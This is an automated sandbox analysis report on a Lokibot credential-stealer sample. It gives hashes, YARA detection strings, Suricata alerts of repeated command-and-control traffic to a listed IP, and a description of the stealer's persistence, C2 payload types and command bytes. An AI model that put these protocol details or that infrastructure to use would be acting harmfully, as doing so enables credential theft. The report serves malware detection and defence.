Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dw7h7aQwVZ.exe

Overview

General Information

Sample name:dw7h7aQwVZ.exe
renamed because original name is a hash value
Original sample name:6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967.exe
Analysis ID:1541963
MD5:3fb350f4356f42b51a523b6fa8cbccf3
SHA1:5f24115b8e734d11deea653df8b32c506c31f4b1
SHA256:6f01d6bd7b69d6e61d55898a1a9f1c228bf644ddb03c7506670dd2e6d9bfc967
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected aPLib compressed binary
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64_ra
  • dw7h7aQwVZ.exe (PID: 1240 cmdline: "C:\Users\user\Desktop\dw7h7aQwVZ.exe" MD5: 3FB350F4356F42B51A523B6FA8CBCCF3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
SourceRuleDescriptionAuthorStrings
dw7h7aQwVZ.exeJoeSecurity_LokibotYara detected LokibotJoe Security
    dw7h7aQwVZ.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      dw7h7aQwVZ.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        dw7h7aQwVZ.exeWindows_Trojan_Lokibot_1f885282unknownunknown
        • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
        dw7h7aQwVZ.exeWindows_Trojan_Lokibot_0f421617unknownunknown
        • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        00000000.00000000.1285704609.0000000000401000.00000020.00000001.01000000.00000003.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
        • 0x43bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
        00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000000.1285721411.0000000000415000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x37f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              Click to see the 1 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-25T11:28:49.502269+020020243121A Network Trojan was detected192.168.2.184969994.156.177.22080TCP
              2024-10-25T11:28:50.635558+020020243121A Network Trojan was detected192.168.2.184970094.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-25T11:28:48.526456+020020253811Malware Command and Control Activity Detected192.168.2.184969994.156.177.22080TCP
              2024-10-25T11:28:49.651298+020020253811Malware Command and Control Activity Detected192.168.2.184970094.156.177.22080TCP
              2024-10-25T11:28:50.712196+020020253811Malware Command and Control Activity Detected192.168.2.184970194.156.177.22080TCP
              2024-10-25T11:28:52.217576+020020253811Malware Command and Control Activity Detected192.168.2.184970394.156.177.22080TCP
              2024-10-25T11:28:53.615196+020020253811Malware Command and Control Activity Detected192.168.2.184970494.156.177.22080TCP
              2024-10-25T11:28:54.898490+020020253811Malware Command and Control Activity Detected192.168.2.184970594.156.177.22080TCP
              2024-10-25T11:28:56.017260+020020253811Malware Command and Control Activity Detected192.168.2.184970694.156.177.22080TCP
              2024-10-25T11:28:57.125135+020020253811Malware Command and Control Activity Detected192.168.2.184970794.156.177.22080TCP
              2024-10-25T11:28:58.258304+020020253811Malware Command and Control Activity Detected192.168.2.184970894.156.177.22080TCP
              2024-10-25T11:28:59.390884+020020253811Malware Command and Control Activity Detected192.168.2.184970994.156.177.22080TCP
              2024-10-25T11:29:00.530239+020020253811Malware Command and Control Activity Detected192.168.2.184971094.156.177.22080TCP
              2024-10-25T11:29:01.681309+020020253811Malware Command and Control Activity Detected192.168.2.186416794.156.177.22080TCP
              2024-10-25T11:29:02.822243+020020253811Malware Command and Control Activity Detected192.168.2.186416894.156.177.22080TCP
              2024-10-25T11:29:03.983922+020020253811Malware Command and Control Activity Detected192.168.2.186416994.156.177.22080TCP
              2024-10-25T11:29:05.122017+020020253811Malware Command and Control Activity Detected192.168.2.186417094.156.177.22080TCP
              2024-10-25T11:29:06.430963+020020253811Malware Command and Control Activity Detected192.168.2.186417194.156.177.22080TCP
              2024-10-25T11:29:07.550024+020020253811Malware Command and Control Activity Detected192.168.2.186417294.156.177.22080TCP
              2024-10-25T11:29:08.684720+020020253811Malware Command and Control Activity Detected192.168.2.186417394.156.177.22080TCP
              2024-10-25T11:29:09.814451+020020253811Malware Command and Control Activity Detected192.168.2.186417494.156.177.22080TCP
              2024-10-25T11:29:10.949279+020020253811Malware Command and Control Activity Detected192.168.2.186417594.156.177.22080TCP
              2024-10-25T11:29:12.081936+020020253811Malware Command and Control Activity Detected192.168.2.186417694.156.177.22080TCP
              2024-10-25T11:29:13.223654+020020253811Malware Command and Control Activity Detected192.168.2.186417794.156.177.22080TCP
              2024-10-25T11:29:14.340855+020020253811Malware Command and Control Activity Detected192.168.2.186417894.156.177.22080TCP
              2024-10-25T11:29:15.464654+020020253811Malware Command and Control Activity Detected192.168.2.186417994.156.177.22080TCP
              2024-10-25T11:29:16.633739+020020253811Malware Command and Control Activity Detected192.168.2.186418094.156.177.22080TCP
              2024-10-25T11:29:17.750103+020020253811Malware Command and Control Activity Detected192.168.2.186418194.156.177.22080TCP
              2024-10-25T11:29:18.913135+020020253811Malware Command and Control Activity Detected192.168.2.186418294.156.177.22080TCP
              2024-10-25T11:29:20.023984+020020253811Malware Command and Control Activity Detected192.168.2.186418394.156.177.22080TCP
              2024-10-25T11:29:21.158391+020020253811Malware Command and Control Activity Detected192.168.2.186418494.156.177.22080TCP
              2024-10-25T11:29:22.318196+020020253811Malware Command and Control Activity Detected192.168.2.186418594.156.177.22080TCP
              2024-10-25T11:29:23.422578+020020253811Malware Command and Control Activity Detected192.168.2.186418694.156.177.22080TCP
              2024-10-25T11:29:24.535211+020020253811Malware Command and Control Activity Detected192.168.2.186418794.156.177.22080TCP
              2024-10-25T11:29:25.670775+020020253811Malware Command and Control Activity Detected192.168.2.186418894.156.177.22080TCP
              2024-10-25T11:29:26.793846+020020253811Malware Command and Control Activity Detected192.168.2.186418994.156.177.22080TCP
              2024-10-25T11:29:27.935220+020020253811Malware Command and Control Activity Detected192.168.2.186419094.156.177.22080TCP
              2024-10-25T11:29:29.054472+020020253811Malware Command and Control Activity Detected192.168.2.186419194.156.177.22080TCP
              2024-10-25T11:29:30.177026+020020253811Malware Command and Control Activity Detected192.168.2.186419294.156.177.22080TCP
              2024-10-25T11:29:31.301159+020020253811Malware Command and Control Activity Detected192.168.2.186419394.156.177.22080TCP
              2024-10-25T11:29:32.403178+020020253811Malware Command and Control Activity Detected192.168.2.186419494.156.177.22080TCP
              2024-10-25T11:29:33.723057+020020253811Malware Command and Control Activity Detected192.168.2.186419594.156.177.22080TCP
              2024-10-25T11:29:34.874543+020020253811Malware Command and Control Activity Detected192.168.2.186419694.156.177.22080TCP
              2024-10-25T11:29:35.995240+020020253811Malware Command and Control Activity Detected192.168.2.186419794.156.177.22080TCP
              2024-10-25T11:29:37.269058+020020253811Malware Command and Control Activity Detected192.168.2.186419894.156.177.22080TCP
              2024-10-25T11:29:38.397005+020020253811Malware Command and Control Activity Detected192.168.2.186419994.156.177.22080TCP
              2024-10-25T11:29:39.536926+020020253811Malware Command and Control Activity Detected192.168.2.186420194.156.177.22080TCP
              2024-10-25T11:29:40.654260+020020253811Malware Command and Control Activity Detected192.168.2.186420294.156.177.22080TCP
              2024-10-25T11:29:41.790844+020020253811Malware Command and Control Activity Detected192.168.2.186420394.156.177.22080TCP
              2024-10-25T11:29:42.941323+020020253811Malware Command and Control Activity Detected192.168.2.186420494.156.177.22080TCP
              2024-10-25T11:29:44.078643+020020253811Malware Command and Control Activity Detected192.168.2.186420694.156.177.22080TCP
              2024-10-25T11:29:45.213270+020020253811Malware Command and Control Activity Detected192.168.2.186420894.156.177.22080TCP
              2024-10-25T11:29:46.330109+020020253811Malware Command and Control Activity Detected192.168.2.186420994.156.177.22080TCP
              2024-10-25T11:29:47.482694+020020253811Malware Command and Control Activity Detected192.168.2.186421094.156.177.22080TCP
              2024-10-25T11:29:48.605816+020020253811Malware Command and Control Activity Detected192.168.2.186421194.156.177.22080TCP
              2024-10-25T11:29:49.798794+020020253811Malware Command and Control Activity Detected192.168.2.186421294.156.177.22080TCP
              2024-10-25T11:29:50.934440+020020253811Malware Command and Control Activity Detected192.168.2.186421394.156.177.22080TCP
              2024-10-25T11:29:52.064655+020020253811Malware Command and Control Activity Detected192.168.2.186421494.156.177.22080TCP
              2024-10-25T11:29:53.204009+020020253811Malware Command and Control Activity Detected192.168.2.186421594.156.177.22080TCP
              2024-10-25T11:29:54.349067+020020253811Malware Command and Control Activity Detected192.168.2.186421694.156.177.22080TCP
              2024-10-25T11:29:55.463755+020020253811Malware Command and Control Activity Detected192.168.2.186421794.156.177.22080TCP
              2024-10-25T11:29:56.583523+020020253811Malware Command and Control Activity Detected192.168.2.186421894.156.177.22080TCP
              2024-10-25T11:29:57.714329+020020253811Malware Command and Control Activity Detected192.168.2.186421994.156.177.22080TCP
              2024-10-25T11:29:58.866731+020020253811Malware Command and Control Activity Detected192.168.2.186422094.156.177.22080TCP
              2024-10-25T11:29:59.980749+020020253811Malware Command and Control Activity Detected192.168.2.186422194.156.177.22080TCP
              2024-10-25T11:30:01.127492+020020253811Malware Command and Control Activity Detected192.168.2.186422294.156.177.22080TCP
              2024-10-25T11:30:02.258244+020020253811Malware Command and Control Activity Detected192.168.2.186422394.156.177.22080TCP
              2024-10-25T11:30:03.396659+020020253811Malware Command and Control Activity Detected192.168.2.186422494.156.177.22080TCP
              2024-10-25T11:30:04.577592+020020253811Malware Command and Control Activity Detected192.168.2.186422594.156.177.22080TCP
              2024-10-25T11:30:05.709458+020020253811Malware Command and Control Activity Detected192.168.2.186422694.156.177.22080TCP
              2024-10-25T11:30:06.831907+020020253811Malware Command and Control Activity Detected192.168.2.186422794.156.177.22080TCP
              2024-10-25T11:30:07.961822+020020253811Malware Command and Control Activity Detected192.168.2.186422894.156.177.22080TCP
              2024-10-25T11:30:09.105260+020020253811Malware Command and Control Activity Detected192.168.2.186422994.156.177.22080TCP
              2024-10-25T11:30:10.731680+020020253811Malware Command and Control Activity Detected192.168.2.186423094.156.177.22080TCP
              2024-10-25T11:30:11.866553+020020253811Malware Command and Control Activity Detected192.168.2.186423194.156.177.22080TCP
              2024-10-25T11:30:12.989441+020020253811Malware Command and Control Activity Detected192.168.2.186423294.156.177.22080TCP
              2024-10-25T11:30:14.159631+020020253811Malware Command and Control Activity Detected192.168.2.186423394.156.177.22080TCP
              2024-10-25T11:30:15.291917+020020253811Malware Command and Control Activity Detected192.168.2.186423494.156.177.22080TCP
              2024-10-25T11:30:16.452907+020020253811Malware Command and Control Activity Detected192.168.2.186423594.156.177.22080TCP
              2024-10-25T11:30:17.572116+020020253811Malware Command and Control Activity Detected192.168.2.186423694.156.177.22080TCP
              2024-10-25T11:30:18.689593+020020253811Malware Command and Control Activity Detected192.168.2.186423794.156.177.22080TCP
              2024-10-25T11:30:19.821385+020020253811Malware Command and Control Activity Detected192.168.2.186423894.156.177.22080TCP
              2024-10-25T11:30:20.946553+020020253811Malware Command and Control Activity Detected192.168.2.186423994.156.177.22080TCP
              2024-10-25T11:30:22.069912+020020253811Malware Command and Control Activity Detected192.168.2.186424094.156.177.22080TCP
              2024-10-25T11:30:23.211887+020020253811Malware Command and Control Activity Detected192.168.2.186424194.156.177.22080TCP
              2024-10-25T11:30:24.373368+020020253811Malware Command and Control Activity Detected192.168.2.186424294.156.177.22080TCP
              2024-10-25T11:30:25.629029+020020253811Malware Command and Control Activity Detected192.168.2.186424394.156.177.22080TCP
              2024-10-25T11:30:26.738112+020020253811Malware Command and Control Activity Detected192.168.2.186424494.156.177.22080TCP
              2024-10-25T11:30:27.879604+020020253811Malware Command and Control Activity Detected192.168.2.186424594.156.177.22080TCP
              2024-10-25T11:30:29.462637+020020253811Malware Command and Control Activity Detected192.168.2.186424694.156.177.22080TCP
              2024-10-25T11:30:30.594455+020020253811Malware Command and Control Activity Detected192.168.2.186424794.156.177.22080TCP
              2024-10-25T11:30:31.721488+020020253811Malware Command and Control Activity Detected192.168.2.186424894.156.177.22080TCP
              2024-10-25T11:30:32.864200+020020253811Malware Command and Control Activity Detected192.168.2.186424994.156.177.22080TCP
              2024-10-25T11:30:34.018598+020020253811Malware Command and Control Activity Detected192.168.2.186425094.156.177.22080TCP
              2024-10-25T11:30:35.149886+020020253811Malware Command and Control Activity Detected192.168.2.186425194.156.177.22080TCP
              2024-10-25T11:30:36.273882+020020253811Malware Command and Control Activity Detected192.168.2.186425294.156.177.22080TCP
              2024-10-25T11:30:37.412674+020020253811Malware Command and Control Activity Detected192.168.2.186425394.156.177.22080TCP
              2024-10-25T11:30:38.567606+020020253811Malware Command and Control Activity Detected192.168.2.186425494.156.177.22080TCP
              2024-10-25T11:30:39.698213+020020253811Malware Command and Control Activity Detected192.168.2.186425594.156.177.22080TCP
              2024-10-25T11:30:40.821388+020020253811Malware Command and Control Activity Detected192.168.2.186425694.156.177.22080TCP
              2024-10-25T11:30:41.962121+020020253811Malware Command and Control Activity Detected192.168.2.186425794.156.177.22080TCP
              2024-10-25T11:30:43.125026+020020253811Malware Command and Control Activity Detected192.168.2.186425894.156.177.22080TCP
              2024-10-25T11:30:44.259225+020020253811Malware Command and Control Activity Detected192.168.2.186425994.156.177.22080TCP
              2024-10-25T11:30:45.411989+020020253811Malware Command and Control Activity Detected192.168.2.186426094.156.177.22080TCP
              2024-10-25T11:30:46.568424+020020253811Malware Command and Control Activity Detected192.168.2.186426194.156.177.22080TCP
              2024-10-25T11:30:47.708109+020020253811Malware Command and Control Activity Detected192.168.2.186426294.156.177.22080TCP
              2024-10-25T11:30:48.826402+020020253811Malware Command and Control Activity Detected192.168.2.186426394.156.177.22080TCP
              2024-10-25T11:30:49.990988+020020253811Malware Command and Control Activity Detected192.168.2.186426494.156.177.22080TCP
              2024-10-25T11:30:51.141273+020020253811Malware Command and Control Activity Detected192.168.2.186426594.156.177.22080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-25T11:28:52.064008+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1849701TCP
              2024-10-25T11:28:53.215038+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1849703TCP
              2024-10-25T11:28:54.623663+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1849704TCP
              2024-10-25T11:28:55.868297+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1849705TCP
              2024-10-25T11:28:56.981230+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1849706TCP
              2024-10-25T11:28:58.101980+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1849707TCP
              2024-10-25T11:28:59.240325+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1849708TCP
              2024-10-25T11:29:00.359155+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1849709TCP
              2024-10-25T11:29:01.536965+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1849710TCP
              2024-10-25T11:29:02.652758+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864167TCP
              2024-10-25T11:29:03.808165+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864168TCP
              2024-10-25T11:29:04.952288+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864169TCP
              2024-10-25T11:29:06.265502+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864170TCP
              2024-10-25T11:29:07.392195+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864171TCP
              2024-10-25T11:29:08.526271+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864172TCP
              2024-10-25T11:29:09.662436+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864173TCP
              2024-10-25T11:29:10.782840+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864174TCP
              2024-10-25T11:29:11.918491+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864175TCP
              2024-10-25T11:29:13.071480+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864176TCP
              2024-10-25T11:29:14.188824+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864177TCP
              2024-10-25T11:29:15.295737+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864178TCP
              2024-10-25T11:29:16.469390+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864179TCP
              2024-10-25T11:29:17.588303+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864180TCP
              2024-10-25T11:29:18.752628+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864181TCP
              2024-10-25T11:29:19.876878+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864182TCP
              2024-10-25T11:29:20.991384+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864183TCP
              2024-10-25T11:29:22.151927+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864184TCP
              2024-10-25T11:29:23.272502+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864185TCP
              2024-10-25T11:29:24.380982+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864186TCP
              2024-10-25T11:29:25.515964+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864187TCP
              2024-10-25T11:29:26.648375+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864188TCP
              2024-10-25T11:29:27.768937+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864189TCP
              2024-10-25T11:29:28.892681+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864190TCP
              2024-10-25T11:29:30.008279+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864191TCP
              2024-10-25T11:29:31.146710+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864192TCP
              2024-10-25T11:29:32.248077+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864193TCP
              2024-10-25T11:29:33.558764+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864194TCP
              2024-10-25T11:29:34.714155+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864195TCP
              2024-10-25T11:29:35.833193+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864196TCP
              2024-10-25T11:29:36.971439+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864197TCP
              2024-10-25T11:29:38.236149+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864198TCP
              2024-10-25T11:29:39.381745+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864199TCP
              2024-10-25T11:29:40.491058+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864201TCP
              2024-10-25T11:29:41.627094+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864202TCP
              2024-10-25T11:29:42.779350+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864203TCP
              2024-10-25T11:29:43.917831+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864204TCP
              2024-10-25T11:29:45.056086+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864206TCP
              2024-10-25T11:29:46.167711+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864208TCP
              2024-10-25T11:29:47.324585+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864209TCP
              2024-10-25T11:29:48.446121+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864210TCP
              2024-10-25T11:29:49.631785+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864211TCP
              2024-10-25T11:29:50.766260+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864212TCP
              2024-10-25T11:29:51.905403+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864213TCP
              2024-10-25T11:29:53.048635+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864214TCP
              2024-10-25T11:29:54.186217+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864215TCP
              2024-10-25T11:29:55.308807+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864216TCP
              2024-10-25T11:29:56.415653+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864217TCP
              2024-10-25T11:29:57.549422+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864218TCP
              2024-10-25T11:29:58.695484+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864219TCP
              2024-10-25T11:29:59.823541+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864220TCP
              2024-10-25T11:30:00.968169+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864221TCP
              2024-10-25T11:30:02.104886+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864222TCP
              2024-10-25T11:30:03.223599+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864223TCP
              2024-10-25T11:30:04.405716+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864224TCP
              2024-10-25T11:30:05.546749+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864225TCP
              2024-10-25T11:30:06.675106+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864226TCP
              2024-10-25T11:30:07.804717+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864227TCP
              2024-10-25T11:30:08.941234+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864228TCP
              2024-10-25T11:30:10.471171+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864229TCP
              2024-10-25T11:30:11.706930+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864230TCP
              2024-10-25T11:30:12.832436+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864231TCP
              2024-10-25T11:30:13.989086+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864232TCP
              2024-10-25T11:30:15.124611+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864233TCP
              2024-10-25T11:30:16.300204+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864234TCP
              2024-10-25T11:30:17.417395+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864235TCP
              2024-10-25T11:30:18.538253+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864236TCP
              2024-10-25T11:30:19.660188+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864237TCP
              2024-10-25T11:30:20.787635+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864238TCP
              2024-10-25T11:30:21.924451+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864239TCP
              2024-10-25T11:30:23.053912+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864240TCP
              2024-10-25T11:30:24.203953+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864241TCP
              2024-10-25T11:30:25.482192+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864242TCP
              2024-10-25T11:30:26.591282+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864243TCP
              2024-10-25T11:30:27.726410+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864244TCP
              2024-10-25T11:30:29.297913+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864245TCP
              2024-10-25T11:30:30.441298+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864246TCP
              2024-10-25T11:30:31.567960+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864247TCP
              2024-10-25T11:30:32.708372+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864248TCP
              2024-10-25T11:30:33.865505+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864249TCP
              2024-10-25T11:30:35.003790+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864250TCP
              2024-10-25T11:30:36.115790+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864251TCP
              2024-10-25T11:30:37.265204+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864252TCP
              2024-10-25T11:30:38.398841+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864253TCP
              2024-10-25T11:30:39.537374+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864254TCP
              2024-10-25T11:30:40.667186+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864255TCP
              2024-10-25T11:30:41.788530+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864256TCP
              2024-10-25T11:30:42.964660+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864257TCP
              2024-10-25T11:30:44.098251+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864258TCP
              2024-10-25T11:30:45.238546+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864259TCP
              2024-10-25T11:30:46.409591+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864260TCP
              2024-10-25T11:30:47.534705+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864261TCP
              2024-10-25T11:30:48.680704+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864262TCP
              2024-10-25T11:30:49.844254+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864263TCP
              2024-10-25T11:30:50.996515+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864264TCP
              2024-10-25T11:30:52.169518+020020254831A Network Trojan was detected94.156.177.22080192.168.2.1864265TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-25T11:28:51.833344+020020243131Malware Command and Control Activity Detected192.168.2.184970194.156.177.22080TCP
              2024-10-25T11:28:53.208596+020020243131Malware Command and Control Activity Detected192.168.2.184970394.156.177.22080TCP
